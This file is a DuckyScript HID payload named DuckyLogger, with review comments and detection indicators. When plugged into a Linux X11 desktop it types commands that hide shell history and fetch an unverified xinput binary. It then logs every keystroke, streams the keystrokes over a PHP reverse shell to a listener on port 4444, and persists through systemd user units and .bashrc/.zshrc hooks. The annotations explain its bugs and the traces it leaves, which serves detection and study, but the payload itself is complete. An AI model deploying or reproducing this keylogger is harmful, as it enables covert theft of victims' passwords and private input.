REM Title: DuckyLogger
REM Description: Keylogger that captures X11 keyboard events with a bundled `xinput test`, streams them to a remote listener through a PHP reverse shell, and persists as a systemd user service plus shell-rc hooks.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Credentials
REM Target: Linux desktop sessions running X11 (not Wayland) with systemd user services; needs bash, wget, php and a terminal bound to CTRL-ALT t on the target
REM Attackmodes: HID
REM [Note]
REM Visit https://github.com/drapl0n/DuckyLogger for usage and other important instructions.
REM [keeping tracks clear]
REM Indicators this payload leaves behind (all visible in the steps below), useful for
REM detection and cleanup: hidden directory /var/tmp/.system containing sys, xinput,
REM systemBus and reboot; user units ~/.config/systemd/user/systemBUS.service and
REM reboot.service; `systemctl --user enable --now ...` lines appended to ~/.bashrc
REM and/or ~/.zshrc; an outbound TCP connection to port 4444 held by a php process;
REM one `xinput test` process per keyboard device.
REM
REM Opens a terminal (CTRL-ALT t, a common desktop binding) and suppresses history for
REM this session. NOTE(review): HISTFILE is unset *before* `rm -f $HISTFILE`, so the
REM variable is already empty when rm runs and no history file is deleted; only the
REM current session is kept out of history (HISTSIZE=0, HISTFILE unset at exit).
DELAY 500
CTRL-ALT t
DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 100
REM [creating key logging mechanism]
REM Drops the helper script `sys` into /var/tmp/.system (dot-prefixed to hide from a
REM plain `ls`). It lists X input devices with the bundled xinput, extracts the id of
REM every "slave keyboard" with grep -Po, and runs `xinput test <id>` on each in
REM parallel (xargs -P0 -n1); every key event is printed to stdout. This depends on
REM X11 -- `xinput test` does not see Wayland input. The `./` path component is a
REM no-op. The script has no shebang and ignores its arguments, so the `-i` passed
REM to it later has no effect.
STRING mkdir /var/tmp/.system
ENTER
DELAY 100
STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/sys
ENTER
DELAY 100
REM [importing xinput]
REM Downloads a prebuilt `xinput` binary from the author's repository rather than
REM using a system package. Review notes: the artifact is not integrity-checked (no
REM hash or signature), and --no-check-certificate disables TLS validation, so the
REM download can be replaced in transit; an operator is trusting a third-party
REM binary that will run on every keyboard device. The 2500 ms DELAY is a blind
REM wait -- on a slow link `chmod +x xinput` runs before the file exists. Whether
REM --content-disposition yields the exact filename `xinput` depends on the server's
REM headers; the payload assumes it does -- TODO confirm. The `\?` keeps the `?`
REM literal for the typing shell.
STRING cd /var/tmp/.system/
ENTER
DELAY 100
STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
ENTER
DELAY 2500
STRING chmod +x xinput
ENTER
DELAY 100
REM [creating reverse shell]
REM Writes the `systemBus` loop: ping the listener host, then have php open a TCP
REM socket to port 4444 and exec() `sys` with its stdio redirected to fd 3, which is
REM expected to be the socket inherited by the child -- key events stream back over
REM that connection. Both `0.0.0.0` occurrences are placeholders that must be
REM replaced with the listener address before use.
REM NOTE(review): inside this double-quoted echo, `\$sock` is escaped but `$?` is
REM not, so the typing shell expands `$?` while the file is being written; the
REM generated `if [ <status> -eq 0 ]` compares a constant (the exit status of the
REM preceding chmod), not the ping result. The quoting around exec() mixes escaped
REM and unescaped double quotes and relies on echo re-joining the split words; the
REM generated file should be inspected before anything depends on it. The loop has
REM no sleep, so a refused connection is retried after each ping round.
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100
REM [creating systemd user service to execute payload at login]
REM Persistence through a *user* unit under ~/.config/systemd/user. A user unit is
REM started by the user's own systemd instance, i.e. when that user logs in, not at
REM boot; it would only survive logout/start at boot if lingering were enabled
REM (loginctl enable-linger), which this payload does not do. `-no-browser` is not
REM an option of bash or of the script and is ignored. The loop script never exits
REM on its own, so SuccessExitStatus/RestartForceExitStatus have no visible effect
REM here; Restart=on-failure restarts it if bash dies.
STRING mkdir -p ~/.config/systemd/user
ENTER
DELAY 200
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100
REM [creating restart script in case the listener stops or the target loses connectivity]
REM A second loop restarts systemBUS.service every 15 minutes. Note this also tears
REM down a live session each time it fires, so the listener sees a reconnect at
REM least every 15 minutes -- a periodic pattern a network monitor can key on.
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/reboot
ENTER
DELAY 100
REM [creating systemd user service for the restart loop]
REM Same unit template as above; the unit is named `reboot.service` in the user scope,
REM which is easy to mistake for a system unit when listing services.
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
ENTER
DELAY 100
REM [enabling service]
REM `enable --now` both enables the unit for default.target and starts it. The two
REM `start --now` calls are redundant: systemctl only accepts --now with
REM enable/disable/mask, so they are expected to be rejected -- harmless, since the
REM units are already running.
STRING systemctl --user daemon-reload
ENTER
DELAY 300
STRING systemctl --user enable --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user start --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user enable --now reboot.service
ENTER
DELAY 150
STRING systemctl --user start --now reboot.service
ENTER
DELAY 100
REM [autostarting service on terminal/shell launch]
REM Writes a throw-away script ~/tmmmp that appends an `enable --now` line to
REM ~/.zshrc and/or ~/.bashrc (whichever `ls -a` matches in $HOME -- the grep is a
REM substring match, so e.g. a `.zshrc.bak` also counts), runs it from $HOME,
REM deletes it, and closes the terminal with `exit`. Unlike the reverse-shell block
REM above, `\$?` is escaped here, so the status check is evaluated at run time.
REM Every new interactive shell re-runs systemctl, giving a second persistence path
REM if the user units are removed but the rc files are not.
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
ENTER
DELAY 100
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER